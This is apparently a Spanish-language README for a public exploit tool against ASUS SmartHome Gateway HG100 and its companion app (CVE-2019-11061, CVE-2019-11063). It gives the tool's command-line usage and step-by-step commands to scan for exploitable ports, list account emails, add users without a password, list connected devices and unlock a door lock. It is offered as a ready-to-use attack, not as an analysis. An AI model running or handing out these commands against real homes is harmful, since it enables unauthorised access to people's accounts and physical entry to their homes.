
ASUS SmartHome Exploit para CVE-2019-11061 y CVE-2019-11063
CVE-2019-11061 : Control de acceso roto en HG100
Productos afectados : ASUS SmartHome Gateway HG100 Versión de firmware < 4.00.09
CVE-2019-11063 : Control de acceso roto en la aplicación SmartHome
Productos afectados : Aplicación ASUS SmartHome Android APP versión < 3.0.45_190701
Si el atacante está en la misma red interna que el HG100 o un dispositivo móvil con la APP complementaria (Android o iPhone). El atacante puede enviar solicitudes de control a ellos.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Escanear puerto explotable del dispositivo móvil (con la APP complementaria instalada para Android o iPhone) :
P.D. La opción -v listará los usuarios que se han añadido al HG100.
o
Escanear puerto explotable del HG100 :
Obtener todos los usuarios que se han añadido al HG100:

o añadir uno nuevo:
Nota: use https://10.42.50.166:8083 para el argumento "cmd".
Por ejemplo:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Obtener toda la información de los dispositivos bajo el SmartHome Gateway:
P.D. Si la opción --user no está configurada, el primer usuario en HG100 será seleccionado automáticamente. (Porque no se necesita contraseña)
Comparar con la app:
Controlar (desbloquear) el DoorLock.
P.D. el valor 1028 se obtiene de la opción -l (paso 3).
Resultado:
